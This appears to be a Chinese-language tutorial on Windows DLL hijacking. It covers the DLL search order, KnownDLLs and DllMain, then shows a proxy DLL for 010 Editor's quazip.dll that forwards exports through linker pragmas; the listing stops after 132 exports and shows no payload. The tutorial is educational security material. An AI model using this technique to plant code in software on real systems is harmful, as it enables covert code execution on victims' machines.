dll劫持代碼演示

DLL文件

在說dll劫持之前，我覺得有必要先說明一下dll文件的用途，dll文件是windows下的動態鏈接庫文件，通常情況下，我們的應用程序並不是將所有的代碼內容都生成爲一個exe可執行文件的，開發者會將部分內容編譯打包成一個後綴爲.dll的庫文件，這樣做就我所知有三大好處：

應用程序本體體積會很小。
不同程序間可共享一個庫文件。
可以增強程序的可擴展性。

介於這些好處，微軟本身也是鼓勵動態庫文件的使用，當然，他也有一個缺點，那就是每次發佈程序，都要講這些dll文件打包與應用程序放在同一目錄下發布，如果缺少dll文件，則這個程序將無法正常啓動，而相對的就有了靜態鏈接庫.lib文件，lib文件會將其裏面的內容一起編譯進可執行文件中，使用在發佈應用程序時，不將.lib文件打包進目錄，該應用程序也是可以運行的。

DLL劫持

對於對滲透安全有了解的人肯定都聽說過這個詞，他就是利用動態鏈接庫動態加載的特性來運行惡意代碼。

然後，先來說說dll庫的加載順序，通常情況下，應用程序並不知道她所要加載的庫文件所在的路徑，他只知道庫文件的名稱，所以它在加載庫文件時有一個墨守陳規的順序
Windows查找DLL的目錄以及對應的順序：
windows xp sp2以前版本

進程對應的應用程序所在目錄；
當前目錄（Current Directory）；
系統目錄（通過 GetSystemDirectory 獲取）；
16位系統目錄；
Windows目錄（通過 GetWindowsDirectory 獲取）；
PATH環境變量中的各個目錄；

windows xp sp2以後版本
微軟在XP SP2之後，爲了安全性添加了一個SafeDllSearchMode的註冊表屬性（HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\SafeDllSearchMode），如果將此項開啓（設爲1），那路徑將會變爲：

進程對應的應用程序所在目錄（可理解爲程序安裝目錄比如C:\ProgramFiles\uTorrent）
系統目錄（即%windir%system32）；
16位系統目錄（即%windir%system）；
Windows目錄（即%windir%）；
當前目錄（運行的某個文件所在目錄，通常情況下某個特定格式的文件會固定用某個軟件打開，比如.docx文件默認用office或者WPS打開，要打開的文件在哪個路徑，則那個打開這個文件的軟件當前路徑就在哪）；
PATH環境變量中的各個目錄；

windows 7 以上版本
win7以上版本使用了KnownDLLs（可在註冊表中查看）凡是此項下的DLL文件就會被禁止從exe自身所在的目錄下調用，路徑：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
所以win7以上版本想要對ws2_32等dll庫進行劫持已經很難了，但是通常情況下，軟件自身會帶有很多自帶的dll庫，我們就可以從這些庫進行入手。

這次我來對010Editor這個軟件進行劫持演示，這是一個用來分析PE文件格式的程序，正常啓動界面
然後我們來看看它的目錄下大概有那些dll庫
可用看到這個程序是基於Qt5開發的，現在我們想要找到其中一個dll庫，然後編寫一個與其同名的庫來對這個庫進行劫持，在劫持之前我們也應該想到，這些庫中都提供了很多的函數，如果這些函數無法使用的話，那這個應用程序自然也就無法正常運行了，那如何解決這個問題？這裏有很多方法，我在這演示最簡單的函數轉發的方法，就是在我們的dll庫中將所有被劫持dll庫中的函數進行轉發，轉發到那個被劫持的dll庫中去，這樣就不會影響到原程序的運行了。不過這種辦法還是比較繁瑣的，因爲有些庫中可能有成千上百個函數。。。

在確認要劫持哪個dll庫之前，我們先用procexp查看這個應用程序都加載了哪些庫，要說明的是，要先將我們要劫持的程序先運行起來，因爲procexp查看的是進程。

除去系統庫，還有Qt的庫，而Qt的庫，就像我說的裏面的函數非常多，我實在是。。。寫不起，所有在這我劫持一個叫quazip的庫，這個庫中的函數相對少一點大概有213個函數
轉發函數方法

#pragma comment(linker, "/EXPORT:[查找的函數名]=[函數實現所在的DLL模塊].[實際導出的函數名],@序號")

s然後還要說明一下DllMain函數

BOOL APIENTRY DllMain
(
 	HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
)

hModule參數：指向DLL本身的實例句柄；
lpReserved參數：爲0表示隱式載入，1表示顯式載入
ul_reason_for_call參數：指明瞭DLL被調用的原因，可以有以下4個取值：
DLL_PROCESS_ATTACH：
當DLL被進程第一次調用時，導致DllMain函數被調用，
同時ul_reason_for_call的值爲DLL_PROCESS_ATTACH，
如果同一個進程後來再次調用此DLL時，操作系統只會增加DLL的使用次數，不會再用DLL_PROCESS_ATTACH調用DLL的DllMain函數
DLL_PROCESS_DETACH：
當DLL被從進程的地址空間解除映射時，系統調用了它的DllMain，傳遞的ul_reason_for_call值是DLL_PROCESS_DETACH。
DLL_THREAD_ATTACH：
當進程創建一線程時，系統查看當前映射到進程地址空間中的所有DLL文件映像，
並用值DLL_THREAD_ATTACH調用DLL的DllMain函數。
新創建的線程負責執行這次的DLL的DllMain函數，
只有當所有的DLL都處理完這一通知後，系統才允許線程開始執行它的線程函數
DLL_THREAD_DETACH：
如果線程調用了ExitThread來結束線程（線程函數返回時，系統也會自動調用ExitThread），
系統查看當前映射到進程空間中的所有DLL文件映像，
並用DLL_THREAD_DETACH來調用DllMain函數，通知所有的DLL去執行線程級的清理工作。

s然後我們就可以寫代碼了，用CFF Explore來查看動態庫都導出了哪些函數

注意，因爲本人怕麻煩，直接將編譯好的dll命名爲quazip.dl然後複製到程序所在目錄下，並且將原本的quazip.dll改名爲quazip2.dll，在真正利用漏洞時過程雖然不同但道理是一樣的

代碼：

#include<Windows.h>

#pragma comment(linker,"/EXPORT:??0QuaAdler32@@QEAA@AEBV0@@Z=quazip2.??0QuaAdler32@@QEAA@AEBV0@@Z,@1")
#pragma comment(linker,"/EXPORT:??0QuaAdler32@@QEAA@XZ=quazip2.??0QuaAdler32@@QEAA@XZ,@2")
#pragma comment(linker,"/EXPORT:??0QuaChecksum32@@QEAA@AEBV0@@Z=quazip2.??0QuaChecksum32@@QEAA@AEBV0@@Z,@3")
#pragma comment(linker,"/EXPORT:??0QuaChecksum32@@QEAA@XZ=quazip2.??0QuaChecksum32@@QEAA@XZ,@4")
#pragma comment(linker,"/EXPORT:??0QuaCrc32@@QEAA@AEBV0@@Z=quazip2.??0QuaCrc32@@QEAA@AEBV0@@Z,@5")
#pragma comment(linker,"/EXPORT:??0QuaCrc32@@QEAA@XZ=quazip2.??0QuaCrc32@@QEAA@XZ,@6")
#pragma comment(linker,"/EXPORT:??0QuaGzipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z=quazip2.??0QuaGzipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z,@7")
#pragma comment(linker,"/EXPORT:??0QuaGzipFile@@QEAA@PEAVQObject@@@Z=quazip2.??0QuaGzipFile@@QEAA@PEAVQObject@@@Z,@8")
#pragma comment(linker,"/EXPORT:??0QuaGzipFile@@QEAA@XZ=quazip2.??0QuaGzipFile@@QEAA@XZ,@9")
#pragma comment(linker,"/EXPORT:??0QuaZIODevice@@QEAA@PEAVQIODevice@@PEAVQObject@@@Z=quazip2.??0QuaZIODevice@@QEAA@PEAVQIODevice@@PEAVQObject@@@Z,@10")
#pragma comment(linker,"/EXPORT:??0QuaZip@@QEAA@AEBVQString@@@Z=quazip2.??0QuaZip@@QEAA@AEBVQString@@@Z,@11")
#pragma comment(linker,"/EXPORT:??0QuaZip@@QEAA@PEAVQIODevice@@@Z=quazip2.??0QuaZip@@QEAA@PEAVQIODevice@@@Z,@12")
#pragma comment(linker,"/EXPORT:??0QuaZip@@QEAA@XZ=quazip2.??0QuaZip@@QEAA@XZ,@13")
#pragma comment(linker,"/EXPORT:??0QuaZipDir@@QEAA@AEBV0@@Z=quazip2.??0QuaZipDir@@QEAA@AEBV0@@Z,@14")
#pragma comment(linker,"/EXPORT:??0QuaZipDir@@QEAA@PEAVQuaZip@@AEBVQString@@@Z=quazip2.??0QuaZipDir@@QEAA@PEAVQuaZip@@AEBVQString@@@Z,@15")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@AEBVQString@@0W4CaseSensitivity@QuaZip@@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@AEBVQString@@0W4CaseSensitivity@QuaZip@@PEAVQObject@@@Z,@16")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z,@17")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@PEAVQObject@@@Z,@18")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@PEAVQuaZip@@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@PEAVQuaZip@@PEAVQObject@@@Z,@19")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@XZ=quazip2.??0QuaZipFile@@QEAA@XZ,@20")
#pragma comment(linker,"/EXPORT:??0QuaZipFileInfo64@@QEAA@AEBU0@@Z=quazip2.??0QuaZipFileInfo64@@QEAA@AEBU0@@Z,@21")
#pragma comment(linker,"/EXPORT:??0QuaZipFileInfo@@QEAA@AEBU0@@Z=quazip2.??0QuaZipFileInfo@@QEAA@AEBU0@@Z,@22")
#pragma comment(linker,"/EXPORT:??0QuaZipFileInfo@@QEAA@XZ=quazip2.??0QuaZipFileInfo@@QEAA@XZ,@23")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBU0@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBU0@@Z,@24")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo64@@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo64@@@Z,@25")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo@@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo@@@Z,@26")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBVQString@@0@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBVQString@@0@Z,@27")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBVQString@@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBVQString@@@Z,@28")
#pragma comment(linker,"/EXPORT:??1QuaGzipFile@@UEAA@XZ=quazip2.??1QuaGzipFile@@UEAA@XZ,@29")
#pragma comment(linker,"/EXPORT:??1QuaZIODevice@@UEAA@XZ=quazip2.??1QuaZIODevice@@UEAA@XZ,@30")
#pragma comment(linker,"/EXPORT:??1QuaZip@@QEAA@XZ=quazip2.??1QuaZip@@QEAA@XZ,@31")
#pragma comment(linker,"/EXPORT:??1QuaZipDir@@QEAA@XZ=quazip2.??1QuaZipDir@@QEAA@XZ,@32")
#pragma comment(linker,"/EXPORT:??1QuaZipFile@@UEAA@XZ=quazip2.??1QuaZipFile@@UEAA@XZ,@33")
#pragma comment(linker,"/EXPORT:??1QuaZipFileInfo64@@QEAA@XZ=quazip2.??1QuaZipFileInfo64@@QEAA@XZ,@34")
#pragma comment(linker,"/EXPORT:??1QuaZipFileInfo@@QEAA@XZ=quazip2.??1QuaZipFileInfo@@QEAA@XZ,@35")
#pragma comment(linker,"/EXPORT:??1QuaZipNewInfo@@QEAA@XZ=quazip2.??1QuaZipNewInfo@@QEAA@XZ,@36")
#pragma comment(linker,"/EXPORT:??4JlCompress@@QEAAAEAV0@AEBV0@@Z=quazip2.??4JlCompress@@QEAAAEAV0@AEBV0@@Z,@37")
#pragma comment(linker,"/EXPORT:??4QuaAdler32@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaAdler32@@QEAAAEAV0@AEBV0@@Z,@38")
#pragma comment(linker,"/EXPORT:??4QuaChecksum32@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaChecksum32@@QEAAAEAV0@AEBV0@@Z,@39")
#pragma comment(linker,"/EXPORT:??4QuaCrc32@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaCrc32@@QEAAAEAV0@AEBV0@@Z,@40")
#pragma comment(linker,"/EXPORT:??4QuaZipDir@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaZipDir@@QEAAAEAV0@AEBV0@@Z,@41")
#pragma comment(linker,"/EXPORT:??4QuaZipFileInfo64@@QEAAAEAU0@AEBU0@@Z=quazip2.??4QuaZipFileInfo64@@QEAAAEAU0@AEBU0@@Z,@42")
#pragma comment(linker,"/EXPORT:??4QuaZipFileInfo@@QEAAAEAU0@AEBU0@@Z=quazip2.??4QuaZipFileInfo@@QEAAAEAU0@AEBU0@@Z,@43")
#pragma comment(linker,"/EXPORT:??4QuaZipNewInfo@@QEAAAEAU0@AEBU0@@Z=quazip2.??4QuaZipNewInfo@@QEAAAEAU0@AEBU0@@Z,@44")
#pragma comment(linker,"/EXPORT:??8QuaZipDir@@QEAA_NAEBV0@@Z=quazip2.??8QuaZipDir@@QEAA_NAEBV0@@Z,@45")
#pragma comment(linker,"/EXPORT:??9QuaZipDir@@QEAA_NAEBV0@@Z=quazip2.??9QuaZipDir@@QEAA_NAEBV0@@Z,@46")
#pragma comment(linker,"/EXPORT:??AQuaZipDir@@QEBA?AVQString@@H@Z=quazip2.??AQuaZipDir@@QEBA?AVQString@@H@Z,@47")
#pragma comment(linker,"/EXPORT:??_7QuaAdler32@@6B@=quazip2.??_7QuaAdler32@@6B@,@48")
#pragma comment(linker,"/EXPORT:??_7QuaChecksum32@@6B@=quazip2.??_7QuaChecksum32@@6B@,@49")
#pragma comment(linker,"/EXPORT:??_7QuaCrc32@@6B@=quazip2.??_7QuaCrc32@@6B@,@50")
#pragma comment(linker,"/EXPORT:??_7QuaGzipFile@@6B@=quazip2.??_7QuaGzipFile@@6B@,@51")
#pragma comment(linker,"/EXPORT:??_7QuaZIODevice@@6B@=quazip2.??_7QuaZIODevice@@6B@,@52")
#pragma comment(linker,"/EXPORT:??_7QuaZipFile@@6B@=quazip2.??_7QuaZipFile@@6B@,@53")
#pragma comment(linker,"/EXPORT:?atEnd@QuaZipFile@@UEBA_NXZ=quazip2.?atEnd@QuaZipFile@@UEBA_NXZ,@54")
#pragma comment(linker,"/EXPORT:?bytesAvailable@QuaZipFile@@UEBA_JXZ=quazip2.?bytesAvailable@QuaZipFile@@UEBA_JXZ,@55")
#pragma comment(linker,"/EXPORT:?calculate@QuaAdler32@@UEAAIAEBVQByteArray@@@Z=quazip2.?calculate@QuaAdler32@@UEAAIAEBVQByteArray@@@Z,@56")
#pragma comment(linker,"/EXPORT:?calculate@QuaCrc32@@UEAAIAEBVQByteArray@@@Z=quazip2.?calculate@QuaCrc32@@UEAAIAEBVQByteArray@@@Z,@57")
#pragma comment(linker,"/EXPORT:?caseSensitivity@QuaZipDir@@QEBA?AW4CaseSensitivity@QuaZip@@XZ=quazip2.?caseSensitivity@QuaZipDir@@QEBA?AW4CaseSensitivity@QuaZip@@XZ,@58")
#pragma comment(linker,"/EXPORT:?cd@QuaZipDir@@QEAA_NAEBVQString@@@Z=quazip2.?cd@QuaZipDir@@QEAA_NAEBVQString@@@Z,@59")
#pragma comment(linker,"/EXPORT:?cdUp@QuaZipDir@@QEAA_NXZ=quazip2.?cdUp@QuaZipDir@@QEAA_NXZ,@60")
#pragma comment(linker,"/EXPORT:?close@QuaGzipFile@@UEAAXXZ=quazip2.?close@QuaGzipFile@@UEAAXXZ,@61")
#pragma comment(linker,"/EXPORT:?close@QuaZIODevice@@UEAAXXZ=quazip2.?close@QuaZIODevice@@UEAAXXZ,@62")
#pragma comment(linker,"/EXPORT:?close@QuaZip@@QEAAXXZ=quazip2.?close@QuaZip@@QEAAXXZ,@63")
#pragma comment(linker,"/EXPORT:?close@QuaZipFile@@UEAAXXZ=quazip2.?close@QuaZipFile@@UEAAXXZ,@64")
#pragma comment(linker,"/EXPORT:?compressDir@JlCompress@@SA_NVQString@@0_N@Z=quazip2.?compressDir@JlCompress@@SA_NVQString@@0_N@Z,@65")
#pragma comment(linker,"/EXPORT:?compressFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z=quazip2.?compressFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z,@66")
#pragma comment(linker,"/EXPORT:?compressFile@JlCompress@@SA_NVQString@@0@Z=quazip2.?compressFile@JlCompress@@SA_NVQString@@0@Z,@67")
#pragma comment(linker,"/EXPORT:?compressFiles@JlCompress@@SA_NVQString@@VQStringList@@@Z=quazip2.?compressFiles@JlCompress@@SA_NVQString@@VQStringList@@@Z,@68")
#pragma comment(linker,"/EXPORT:?compressSubDir@JlCompress@@CA_NPEAVQuaZip@@VQString@@1_N@Z=quazip2.?compressSubDir@JlCompress@@CA_NPEAVQuaZip@@VQString@@1_N@Z,@69")
#pragma comment(linker,"/EXPORT:?convertCaseSensitivity@QuaZip@@SA?AW4CaseSensitivity@Qt@@W421@@Z=quazip2.?convertCaseSensitivity@QuaZip@@SA?AW4CaseSensitivity@Qt@@W421@@Z,@70")
#pragma comment(linker,"/EXPORT:?count@QuaZipDir@@QEBAIXZ=quazip2.?count@QuaZipDir@@QEBAIXZ,@71")
#pragma comment(linker,"/EXPORT:?csize@QuaZipFile@@QEBA_JXZ=quazip2.?csize@QuaZipFile@@QEBA_JXZ,@72")
#pragma comment(linker,"/EXPORT:?dirName@QuaZipDir@@QEBA?AVQString@@XZ=quazip2.?dirName@QuaZipDir@@QEBA?AVQString@@XZ,@73")
#pragma comment(linker,"/EXPORT:?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@74")
#pragma comment(linker,"/EXPORT:?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@75")
#pragma comment(linker,"/EXPORT:?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@76")
#pragma comment(linker,"/EXPORT:?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@77")
#pragma comment(linker,"/EXPORT:?entryList@QuaZipDir@@QEBA?AVQStringList@@AEBV2@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryList@QuaZipDir@@QEBA?AVQStringList@@AEBV2@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@78")
#pragma comment(linker,"/EXPORT:?entryList@QuaZipDir@@QEBA?AVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryList@QuaZipDir@@QEBA?AVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@79")
#pragma comment(linker,"/EXPORT:?exists@QuaZipDir@@QEBA_NAEBVQString@@@Z=quazip2.?exists@QuaZipDir@@QEBA_NAEBVQString@@@Z,@80")
#pragma comment(linker,"/EXPORT:?exists@QuaZipDir@@QEBA_NXZ=quazip2.?exists@QuaZipDir@@QEBA_NXZ,@81")
#pragma comment(linker,"/EXPORT:?extractDir@JlCompress@@SA?AVQStringList@@VQString@@0@Z=quazip2.?extractDir@JlCompress@@SA?AVQStringList@@VQString@@0@Z,@82")
#pragma comment(linker,"/EXPORT:?extractFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z=quazip2.?extractFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z,@83")
#pragma comment(linker,"/EXPORT:?extractFile@JlCompress@@SA?AVQString@@V2@00@Z=quazip2.?extractFile@JlCompress@@SA?AVQString@@V2@00@Z,@84")
#pragma comment(linker,"/EXPORT:?extractFiles@JlCompress@@SA?AVQStringList@@VQString@@V2@0@Z=quazip2.?extractFiles@JlCompress@@SA?AVQStringList@@VQString@@V2@0@Z,@85")
#pragma comment(linker,"/EXPORT:?filePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z=quazip2.?filePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z,@86")
#pragma comment(linker,"/EXPORT:?filter@QuaZipDir@@QEAA?AV?$QFlags@W4Filter@QDir@@@@XZ=quazip2.?filter@QuaZipDir@@QEAA?AV?$QFlags@W4Filter@QDir@@@@XZ,@87")
#pragma comment(linker,"/EXPORT:?flush@QuaGzipFile@@UEAA_NXZ=quazip2.?flush@QuaGzipFile@@UEAA_NXZ,@88")
#pragma comment(linker,"/EXPORT:?flush@QuaZIODevice@@UEAA_NXZ=quazip2.?flush@QuaZIODevice@@UEAA_NXZ,@89")
#pragma comment(linker,"/EXPORT:?getActualFileName@QuaZipFile@@QEBA?AVQString@@XZ=quazip2.?getActualFileName@QuaZipFile@@QEBA?AVQString@@XZ,@90")
#pragma comment(linker,"/EXPORT:?getCaseSensitivity@QuaZipFile@@QEBA?AW4CaseSensitivity@QuaZip@@XZ=quazip2.?getCaseSensitivity@QuaZipFile@@QEBA?AW4CaseSensitivity@QuaZip@@XZ,@91")
#pragma comment(linker,"/EXPORT:?getComment@QuaZip@@QEBA?AVQString@@XZ=quazip2.?getComment@QuaZip@@QEBA?AVQString@@XZ,@92")
#pragma comment(linker,"/EXPORT:?getCommentCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ=quazip2.?getCommentCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ,@93")
#pragma comment(linker,"/EXPORT:?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo64@@@Z=quazip2.?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo64@@@Z,@94")
#pragma comment(linker,"/EXPORT:?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo@@@Z=quazip2.?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo@@@Z,@95")
#pragma comment(linker,"/EXPORT:?getCurrentFileName@QuaZip@@QEBA?AVQString@@XZ=quazip2.?getCurrentFileName@QuaZip@@QEBA?AVQString@@XZ,@96")
#pragma comment(linker,"/EXPORT:?getEntriesCount@QuaZip@@QEBAHXZ=quazip2.?getEntriesCount@QuaZip@@QEBAHXZ,@97")
#pragma comment(linker,"/EXPORT:?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo64@@@Z=quazip2.?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo64@@@Z,@98")
#pragma comment(linker,"/EXPORT:?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo@@@Z=quazip2.?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo@@@Z,@99")
#pragma comment(linker,"/EXPORT:?getFileInfoList64@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@XZ=quazip2.?getFileInfoList64@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@XZ,@100")
#pragma comment(linker,"/EXPORT:?getFileInfoList@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo@@@@XZ=quazip2.?getFileInfoList@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo@@@@XZ,@101")
#pragma comment(linker,"/EXPORT:?getFileList@JlCompress@@SA?AVQStringList@@VQString@@@Z=quazip2.?getFileList@JlCompress@@SA?AVQStringList@@VQString@@@Z,@102")
#pragma comment(linker,"/EXPORT:?getFileName@QuaGzipFile@@QEBA?AVQString@@XZ=quazip2.?getFileName@QuaGzipFile@@QEBA?AVQString@@XZ,@103")
#pragma comment(linker,"/EXPORT:?getFileName@QuaZipFile@@QEBA?AVQString@@XZ=quazip2.?getFileName@QuaZipFile@@QEBA?AVQString@@XZ,@104")
#pragma comment(linker,"/EXPORT:?getFileNameCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ=quazip2.?getFileNameCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ,@105")
#pragma comment(linker,"/EXPORT:?getFileNameList@QuaZip@@QEBA?AVQStringList@@XZ=quazip2.?getFileNameList@QuaZip@@QEBA?AVQStringList@@XZ,@106")
#pragma comment(linker,"/EXPORT:?getIoDevice@QuaZIODevice@@QEBAPEAVQIODevice@@XZ=quazip2.?getIoDevice@QuaZIODevice@@QEBAPEAVQIODevice@@XZ,@107")
#pragma comment(linker,"/EXPORT:?getIoDevice@QuaZip@@QEBAPEAVQIODevice@@XZ=quazip2.?getIoDevice@QuaZip@@QEBAPEAVQIODevice@@XZ,@108")
#pragma comment(linker,"/EXPORT:?getMode@QuaZip@@QEBA?AW4Mode@1@XZ=quazip2.?getMode@QuaZip@@QEBA?AW4Mode@1@XZ,@109")
#pragma comment(linker,"/EXPORT:?getNTFSaTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z=quazip2.?getNTFSaTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z,@110")
#pragma comment(linker,"/EXPORT:?getNTFScTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z=quazip2.?getNTFScTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z,@111")
#pragma comment(linker,"/EXPORT:?getNTFSmTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z=quazip2.?getNTFSmTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z,@112")
#pragma comment(linker,"/EXPORT:?getPermissions@QuaZipFileInfo64@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ=quazip2.?getPermissions@QuaZipFileInfo64@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ,@113")
#pragma comment(linker,"/EXPORT:?getPermissions@QuaZipFileInfo@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ=quazip2.?getPermissions@QuaZipFileInfo@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ,@114")
#pragma comment(linker,"/EXPORT:?getUnzFile@QuaZip@@QEAAPEAXXZ=quazip2.?getUnzFile@QuaZip@@QEAAPEAXXZ,@115")
#pragma comment(linker,"/EXPORT:?getZip@QuaZipFile@@QEBAPEAVQuaZip@@XZ=quazip2.?getZip@QuaZipFile@@QEBAPEAVQuaZip@@XZ,@116")
#pragma comment(linker,"/EXPORT:?getZipError@QuaZip@@QEBAHXZ=quazip2.?getZipError@QuaZip@@QEBAHXZ,@117")
#pragma comment(linker,"/EXPORT:?getZipError@QuaZipFile@@QEBAHXZ=quazip2.?getZipError@QuaZipFile@@QEBAHXZ,@118")
#pragma comment(linker,"/EXPORT:?getZipFile@QuaZip@@QEAAPEAXXZ=quazip2.?getZipFile@QuaZip@@QEAAPEAXXZ,@119")
#pragma comment(linker,"/EXPORT:?getZipName@QuaZip@@QEBA?AVQString@@XZ=quazip2.?getZipName@QuaZip@@QEBA?AVQString@@XZ,@120")
#pragma comment(linker,"/EXPORT:?getZipName@QuaZipFile@@QEBA?AVQString@@XZ=quazip2.?getZipName@QuaZipFile@@QEBA?AVQString@@XZ,@121")
#pragma comment(linker,"/EXPORT:?goToFirstFile@QuaZip@@QEAA_NXZ=quazip2.?goToFirstFile@QuaZip@@QEAA_NXZ,@122")
#pragma comment(linker,"/EXPORT:?goToNextFile@QuaZip@@QEAA_NXZ=quazip2.?goToNextFile@QuaZip@@QEAA_NXZ,@123")
#pragma comment(linker,"/EXPORT:?hasCurrentFile@QuaZip@@QEBA_NXZ=quazip2.?hasCurrentFile@QuaZip@@QEBA_NXZ,@124")
#pragma comment(linker,"/EXPORT:?isAutoClose@QuaZip@@QEBA_NXZ=quazip2.?isAutoClose@QuaZip@@QEBA_NXZ,@125")
#pragma comment(linker,"/EXPORT:?isDataDescriptorWritingEnabled@QuaZip@@QEBA_NXZ=quazip2.?isDataDescriptorWritingEnabled@QuaZip@@QEBA_NXZ,@126")
#pragma comment(linker,"/EXPORT:?isEncrypted@QuaZipFileInfo64@@QEBA_NXZ=quazip2.?isEncrypted@QuaZipFileInfo64@@QEBA_NXZ,@127")
#pragma comment(linker,"/EXPORT:?isOpen@QuaZip@@QEBA_NXZ=quazip2.?isOpen@QuaZip@@QEBA_NXZ,@128")
#pragma comment(linker,"/EXPORT:?isRaw@QuaZipFile@@QEBA_NXZ=quazip2.?isRaw@QuaZipFile@@QEBA_NXZ,@129")
#pragma comment(linker,"/EXPORT:?isRoot@QuaZipDir@@QEBA_NXZ=quazip2.?isRoot@QuaZipDir@@QEBA_NXZ,@130")
#pragma comment(linker,"/EXPORT:?isSequential@QuaGzipFile@@UEBA_NXZ=quazip2.?isSequential@QuaGzipFile@@UEBA_NXZ,@131")
#pragma comment(linker,"/EXPORT:?isSequential@QuaZIODevice@@UEBA_NXZ=quazip2.?isSequential@QuaZIODevice@@UEBA_NXZ,@132")
